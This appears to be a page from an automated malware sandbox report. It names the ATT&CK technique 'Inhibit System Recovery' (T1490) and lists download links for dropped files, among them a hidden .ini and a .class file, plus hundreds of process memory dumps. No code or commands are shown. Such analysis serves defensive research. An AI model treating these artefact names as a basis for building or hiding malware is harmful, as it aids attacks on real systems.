Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\.ntusernt.ini

Download Submit
C:\Users\Admin\ujTBR\Desktop.ini

Download Submit
C:\Users\Admin\ujTBR\NXtxm.class

Download Submit
\Users\Admin\AppData\Local\Temp\rffmkGjZJz1739107710134319911.xml

Download Submit
memory/108-259-0x0000000000000000-mapping.dmp

Download
memory/108-195-0x0000000000000000-mapping.dmp

Download
memory/108-105-0x0000000000000000-mapping.dmp

Download
memory/108-1-0x0000000000000000-mapping.dmp

Download
memory/112-36-0x0000000000000000-mapping.dmp

Download
memory/112-236-0x0000000000000000-mapping.dmp

Download
memory/112-124-0x0000000000000000-mapping.dmp

Download
memory/112-86-0x0000000000000000-mapping.dmp

Download
memory/240-278-0x0000000000000000-mapping.dmp

Download
memory/240-92-0x0000000000000000-mapping.dmp

Download
memory/376-288-0x0000000000000000-mapping.dmp

Download
memory/376-28-0x0000000000000000-mapping.dmp

Download
memory/480-184-0x0000000000000000-mapping.dmp

Download
memory/480-220-0x0000000000000000-mapping.dmp

Download
memory/536-113-0x0000000000000000-mapping.dmp

Download
memory/536-276-0x0000000000000000-mapping.dmp

Download
memory/536-51-0x0000000000000000-mapping.dmp

Download
memory/552-142-0x0000000000000000-mapping.dmp

Download
memory/552-108-0x0000000000000000-mapping.dmp

Download
memory/556-228-0x0000000000000000-mapping.dmp

Download
memory/576-29-0x0000000000000000-mapping.dmp

Download
memory/576-83-0x0000000000000000-mapping.dmp

Download
memory/584-65-0x0000000000000000-mapping.dmp

Download
memory/584-249-0x0000000000000000-mapping.dmp

Download
memory/624-57-0x0000000000000000-mapping.dmp

Download
memory/660-180-0x0000000000000000-mapping.dmp

Download
memory/660-136-0x0000000000000000-mapping.dmp

Download
memory/660-59-0x0000000000000000-mapping.dmp

Download
memory/660-273-0x0000000000000000-mapping.dmp

Download
memory/684-131-0x0000000000000000-mapping.dmp

Download
memory/684-240-0x0000000000000000-mapping.dmp

Download
memory/744-78-0x0000000000000000-mapping.dmp

Download
memory/744-112-0x0000000000000000-mapping.dmp

Download
memory/748-99-0x0000000000000000-mapping.dmp

Download
memory/748-128-0x0000000000000000-mapping.dmp

Download
memory/752-146-0x0000000000000000-mapping.dmp

Download
memory/760-143-0x0000000000000000-mapping.dmp

Download
memory/760-185-0x0000000000000000-mapping.dmp

Download
memory/760-30-0x0000000000000000-mapping.dmp

Download
memory/764-234-0x0000000000000000-mapping.dmp

Download
memory/764-198-0x0000000000000000-mapping.dmp

Download
memory/772-40-0x0000000000000000-mapping.dmp

Download
memory/796-49-0x0000000000000000-mapping.dmp

Download
memory/796-282-0x0000000000000000-mapping.dmp

Download
memory/824-52-0x0000000000000000-mapping.dmp

Download
memory/824-177-0x0000000000000000-mapping.dmp

Download
memory/860-122-0x0000000000000000-mapping.dmp

Download
memory/860-268-0x0000000000000000-mapping.dmp

Download
memory/860-34-0x0000000000000000-mapping.dmp

Download
memory/892-193-0x0000000000000000-mapping.dmp

Download
memory/892-110-0x0000000000000000-mapping.dmp

Download
memory/908-2-0x0000000000000000-mapping.dmp

Download
memory/1008-120-0x0000000000000000-mapping.dmp

Download
memory/1008-280-0x0000000000000000-mapping.dmp

Download
memory/1036-209-0x0000000000000000-mapping.dmp

Download
memory/1036-85-0x0000000000000000-mapping.dmp

Download
memory/1060-56-0x0000000000000000-mapping.dmp

Download
memory/1060-37-0x0000000000000000-mapping.dmp

Download
memory/1076-35-0x0000000000000000-mapping.dmp

Download
memory/1084-58-0x0000000000000000-mapping.dmp

Download
memory/1084-211-0x0000000000000000-mapping.dmp

Download
memory/1088-175-0x0000000000000000-mapping.dmp

Download
memory/1100-38-0x0000000000000000-mapping.dmp

Download
memory/1100-272-0x0000000000000000-mapping.dmp

Download
memory/1100-98-0x0000000000000000-mapping.dmp

Download
memory/1112-138-0x0000000000000000-mapping.dmp

Download
memory/1112-265-0x0000000000000000-mapping.dmp

Download
memory/1112-224-0x0000000000000000-mapping.dmp

Download
memory/1112-5-0x0000000000000000-mapping.dmp

Download
memory/1116-246-0x0000000000000000-mapping.dmp

Download
memory/1120-222-0x0000000000000000-mapping.dmp

Download
memory/1120-4-0x0000000000000000-mapping.dmp

Download
memory/1120-253-0x0000000000000000-mapping.dmp

Download
memory/1136-255-0x0000000000000000-mapping.dmp

Download
memory/1136-32-0x0000000000000000-mapping.dmp

Download
memory/1216-235-0x0000000000000000-mapping.dmp

Download
memory/1216-263-0x0000000000000000-mapping.dmp

Download
memory/1216-93-0x0000000000000000-mapping.dmp

Download
memory/1216-157-0x0000000000000000-mapping.dmp

Download
memory/1264-114-0x0000000000000000-mapping.dmp

Download
memory/1264-81-0x0000000000000000-mapping.dmp

Download
memory/1268-53-0x0000000000000000-mapping.dmp

Download
memory/1268-80-0x0000000000000000-mapping.dmp

Download
memory/1268-10-0x0000000000000000-mapping.dmp

Download
memory/1332-190-0x0000000000000000-mapping.dmp

Download
memory/1332-111-0x0000000000000000-mapping.dmp

Download
memory/1336-66-0x0000000000000000-mapping.dmp

Download
memory/1336-127-0x0000000000000000-mapping.dmp

Download
memory/1336-206-0x0000000000000000-mapping.dmp

Download
memory/1340-229-0x0000000000000000-mapping.dmp

Download
memory/1340-47-0x0000000000000000-mapping.dmp

Download
memory/1368-82-0x0000000000000000-mapping.dmp

Download
memory/1368-132-0x0000000000000000-mapping.dmp

Download
memory/1368-257-0x0000000000000000-mapping.dmp

Download
memory/1376-269-0x0000000000000000-mapping.dmp

Download
memory/1376-199-0x0000000000000000-mapping.dmp

Download
memory/1380-125-0x0000000000000000-mapping.dmp

Download
memory/1380-61-0x0000000000000000-mapping.dmp

Download
memory/1380-41-0x0000000000000000-mapping.dmp

Download
memory/1448-191-0x0000000000000000-mapping.dmp

Download
memory/1476-292-0x0000000000000000-mapping.dmp

Download
memory/1488-64-0x0000000000000000-mapping.dmp

Download
memory/1492-187-0x0000000000000000-mapping.dmp

Download
memory/1496-225-0x0000000000000000-mapping.dmp

Download
memory/1496-70-0x0000000000000000-mapping.dmp

Download
memory/1500-33-0x0000000000000000-mapping.dmp

Download
memory/1520-243-0x0000000000000000-mapping.dmp

Download
memory/1520-39-0x0000000000000000-mapping.dmp

Download
memory/1520-133-0x0000000000000000-mapping.dmp

Download
memory/1520-173-0x0000000000000000-mapping.dmp

Download
memory/1524-250-0x0000000000000000-mapping.dmp

Download
memory/1552-256-0x0000000000000000-mapping.dmp

Download
memory/1552-226-0x0000000000000000-mapping.dmp

Download
memory/1552-192-0x0000000000000000-mapping.dmp

Download
memory/1560-291-0x0000000000000000-mapping.dmp

Download
memory/1568-77-0x0000000000000000-mapping.dmp

Download
memory/1568-223-0x0000000000000000-mapping.dmp

Download
memory/1568-46-0x0000000000000000-mapping.dmp

Download
memory/1568-188-0x0000000000000000-mapping.dmp

Download
memory/1572-18-0x0000000000000000-mapping.dmp

Download
memory/1572-134-0x0000000000000000-mapping.dmp

Download
memory/1572-210-0x0000000000000000-mapping.dmp

Download
memory/1572-285-0x0000000000000000-mapping.dmp

Download
memory/1576-261-0x0000000000000000-mapping.dmp

Download
memory/1584-219-0x0000000000000000-mapping.dmp

Download
memory/1584-251-0x0000000000000000-mapping.dmp

Download
memory/1592-101-0x0000000000000000-mapping.dmp

Download
memory/1592-45-0x0000000000000000-mapping.dmp

Download
memory/1596-260-0x0000000000000000-mapping.dmp

Download
memory/1596-231-0x0000000000000000-mapping.dmp

Download
memory/1596-194-0x0000000000000000-mapping.dmp

Download
memory/1596-289-0x0000000000000000-mapping.dmp

Download
memory/1608-54-0x0000000000000000-mapping.dmp

Download
memory/1608-275-0x0000000000000000-mapping.dmp

Download
memory/1608-155-0x0000000000000000-mapping.dmp

Download
memory/1612-69-0x0000000000000000-mapping.dmp

Download
memory/1612-244-0x0000000000000000-mapping.dmp

Download
memory/1612-129-0x0000000000000000-mapping.dmp

Download
memory/1624-130-0x0000000000000000-mapping.dmp

Download
memory/1624-168-0x0000000000000000-mapping.dmp

Download
memory/1628-74-0x0000000000000000-mapping.dmp

Download
memory/1628-230-0x0000000000000000-mapping.dmp

Download
memory/1628-3-0x0000000000000000-mapping.dmp

Download
memory/1632-208-0x0000000000000000-mapping.dmp

Download
memory/1640-140-0x0000000000000000-mapping.dmp

Download
memory/1640-183-0x0000000000000000-mapping.dmp

Download
memory/1644-116-0x0000000000000000-mapping.dmp

Download
memory/1644-203-0x0000000000000000-mapping.dmp

Download
memory/1644-238-0x0000000000000000-mapping.dmp

Download
memory/1652-16-0x0000000000000000-mapping.dmp

Download
memory/1652-149-0x0000000000000000-mapping.dmp

Download
memory/1652-196-0x0000000000000000-mapping.dmp

Download
memory/1656-97-0x0000000000000000-mapping.dmp

Download
memory/1656-205-0x0000000000000000-mapping.dmp

Download
memory/1664-270-0x0000000000000000-mapping.dmp

Download
memory/1664-15-0x0000000000000000-mapping.dmp

Download
memory/1664-141-0x0000000000000000-mapping.dmp

Download
memory/1672-252-0x0000000000000000-mapping.dmp

Download
memory/1692-144-0x0000000000000000-mapping.dmp

Download
memory/1696-274-0x0000000000000000-mapping.dmp

Download
memory/1708-171-0x0000000000000000-mapping.dmp

Download
memory/1716-79-0x0000000000000000-mapping.dmp

Download
memory/1716-6-0x0000000000000000-mapping.dmp

Download
memory/1776-14-0x0000000000000000-mapping.dmp

Download
memory/1780-145-0x0000000000000000-mapping.dmp

Download
memory/1780-221-0x0000000000000000-mapping.dmp

Download
memory/1784-12-0x0000000000000000-mapping.dmp

Download
memory/1788-147-0x0000000000000000-mapping.dmp

Download
memory/1792-44-0x0000000000000000-mapping.dmp

Download
memory/1796-43-0x0000000000000000-mapping.dmp

Download
memory/1796-126-0x0000000000000000-mapping.dmp

Download
memory/1796-165-0x0000000000000000-mapping.dmp

Download
memory/1800-42-0x0000000000000000-mapping.dmp

Download
memory/1804-213-0x0000000000000000-mapping.dmp

Download
memory/1804-137-0x0000000000000000-mapping.dmp

Download
memory/1804-76-0x0000000000000000-mapping.dmp

Download
memory/1808-284-0x0000000000000000-mapping.dmp

Download
memory/1808-207-0x0000000000000000-mapping.dmp

Download
memory/1808-241-0x0000000000000000-mapping.dmp

Download
memory/1812-135-0x0000000000000000-mapping.dmp

Download
memory/1812-50-0x0000000000000000-mapping.dmp

Download
memory/1812-227-0x0000000000000000-mapping.dmp

Download
memory/1820-239-0x0000000000000000-mapping.dmp

Download
memory/1820-8-0x0000000000000000-mapping.dmp

Download
memory/1824-201-0x0000000000000000-mapping.dmp

Download
memory/1824-161-0x0000000000000000-mapping.dmp

Download
memory/1832-11-0x0000000000000000-mapping.dmp

Download
memory/1832-286-0x0000000000000000-mapping.dmp

Download
memory/1840-72-0x0000000000000000-mapping.dmp

Download
memory/1840-139-0x0000000000000000-mapping.dmp

Download
memory/1840-218-0x0000000000000000-mapping.dmp

Download
memory/1840-290-0x0000000000000000-mapping.dmp

Download
memory/1844-267-0x0000000000000000-mapping.dmp

Download
memory/1844-233-0x0000000000000000-mapping.dmp

Download
memory/1848-95-0x0000000000000000-mapping.dmp

Download
memory/1852-152-0x0000000000000000-mapping.dmp

Download
memory/1852-204-0x0000000000000000-mapping.dmp

Download
memory/1860-123-0x0000000000000000-mapping.dmp

Download
memory/1860-20-0x0000000000000000-mapping.dmp

Download
memory/1864-21-0x0000000000000000-mapping.dmp

Download
memory/1864-84-0x0000000000000000-mapping.dmp

Download
memory/1892-283-0x0000000000000000-mapping.dmp

Download
memory/1896-117-0x0000000001F20000-0x0000000001F21000-memory.dmp

Filesize
4KB

Download
memory/1896-19-0x0000000000000000-mapping.dmp

Download
memory/1896-154-0x0000000002670000-0x0000000002671000-memory.dmp

Filesize
4KB

Download
memory/1896-174-0x00000000026B0000-0x00000000026B1000-memory.dmp

Filesize
4KB

Download
memory/1896-62-0x000007FEF6AC0000-0x000007FEF74AC000-memory.dmp

Filesize
9.9MB

Download
memory/1896-176-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/1896-109-0x0000000002370000-0x0000000002371000-memory.dmp

Filesize
4KB

Download
memory/1896-103-0x0000000002290000-0x0000000002291000-memory.dmp

Filesize
4KB

Download
memory/1896-106-0x000000001AE60000-0x000000001AE61000-memory.dmp

Filesize
4KB

Download
memory/1896-148-0x00000000024D0000-0x00000000024D1000-memory.dmp

Filesize
4KB

Download
memory/1900-271-0x0000000000000000-mapping.dmp

Download
memory/1900-215-0x0000000000000000-mapping.dmp

Download
memory/1908-254-0x0000000000000000-mapping.dmp

Download
memory/1908-107-0x0000000000000000-mapping.dmp

Download
memory/1908-24-0x0000000000000000-mapping.dmp

Download
memory/1912-281-0x0000000000000000-mapping.dmp

Download
memory/1912-237-0x0000000000000000-mapping.dmp

Download
memory/1912-115-0x0000000000000000-mapping.dmp

Download
memory/1916-73-0x0000000000000000-mapping.dmp

Download
memory/1916-248-0x0000000000000000-mapping.dmp

Download
memory/1920-217-0x0000000000000000-mapping.dmp

Download
memory/1920-22-0x0000000000000000-mapping.dmp

Download
memory/1924-200-0x0000000000000000-mapping.dmp

Download
memory/1924-262-0x0000000000000000-mapping.dmp

Download
memory/1928-163-0x0000000000000000-mapping.dmp

Download
memory/1928-279-0x0000000000000000-mapping.dmp

Download
memory/1928-96-0x0000000000000000-mapping.dmp

Download
memory/1928-60-0x0000000000000000-mapping.dmp

Download
memory/1936-153-0x0000000000000000-mapping.dmp

Download
memory/1936-232-0x0000000000000000-mapping.dmp

Download
memory/1944-23-0x0000000000000000-mapping.dmp

Download
memory/1944-88-0x0000000000000000-mapping.dmp

Download
memory/1948-216-0x0000000000000000-mapping.dmp

Download
memory/1952-100-0x0000000000000000-mapping.dmp

Download
memory/1960-214-0x0000000000000000-mapping.dmp

Download
memory/1968-121-0x0000000000000000-mapping.dmp

Download
memory/1972-55-0x0000000000000000-mapping.dmp

Download
memory/1972-212-0x0000000000000000-mapping.dmp

Download
memory/1972-277-0x0000000000000000-mapping.dmp

Download
memory/1984-197-0x0000000000000000-mapping.dmp

Download
memory/1984-25-0x0000000000000000-mapping.dmp

Download
memory/1988-87-0x0000000000000000-mapping.dmp

Download
memory/1996-48-0x0000000000000000-mapping.dmp

Download
memory/1996-94-0x0000000000000000-mapping.dmp

Download
memory/1996-202-0x0000000000000000-mapping.dmp

Download
memory/2000-178-0x0000000000000000-mapping.dmp

Download
memory/2000-63-0x0000000000000000-mapping.dmp

Download
memory/2004-31-0x0000000000000000-mapping.dmp

Download
memory/2004-67-0x0000000000000000-mapping.dmp

Download
memory/2004-242-0x0000000000000000-mapping.dmp

Download
memory/2008-104-0x0000000000000000-mapping.dmp

Download
memory/2008-71-0x0000000000000000-mapping.dmp

Download
memory/2008-181-0x0000000000000000-mapping.dmp

Download
memory/2012-266-0x0000000000000000-mapping.dmp

Download
memory/2012-182-0x0000000000000000-mapping.dmp

Download
memory/2012-75-0x0000000000000000-mapping.dmp

Download
memory/2020-68-0x0000000000000000-mapping.dmp

Download
memory/2020-245-0x0000000000000000-mapping.dmp

Download
memory/2020-287-0x0000000000000000-mapping.dmp

Download
memory/2020-102-0x0000000000000000-mapping.dmp

Download
memory/2024-119-0x0000000000000000-mapping.dmp

Download
memory/2024-91-0x0000000000000000-mapping.dmp

Download
memory/2024-258-0x0000000000000000-mapping.dmp

Download
memory/2028-27-0x0000000000000000-mapping.dmp

Download
memory/2028-189-0x0000000000000000-mapping.dmp

Download
memory/2032-186-0x0000000000000000-mapping.dmp

Download
memory/2036-264-0x0000000000000000-mapping.dmp

Download
memory/2036-90-0x0000000000000000-mapping.dmp

Download
memory/2036-26-0x0000000000000000-mapping.dmp

Download
memory/2040-118-0x0000000000000000-mapping.dmp

Download
memory/2044-179-0x0000000000000000-mapping.dmp

Download
memory/2044-89-0x0000000000000000-mapping.dmp

Download
memory/2044-247-0x0000000000000000-mapping.dmp

Download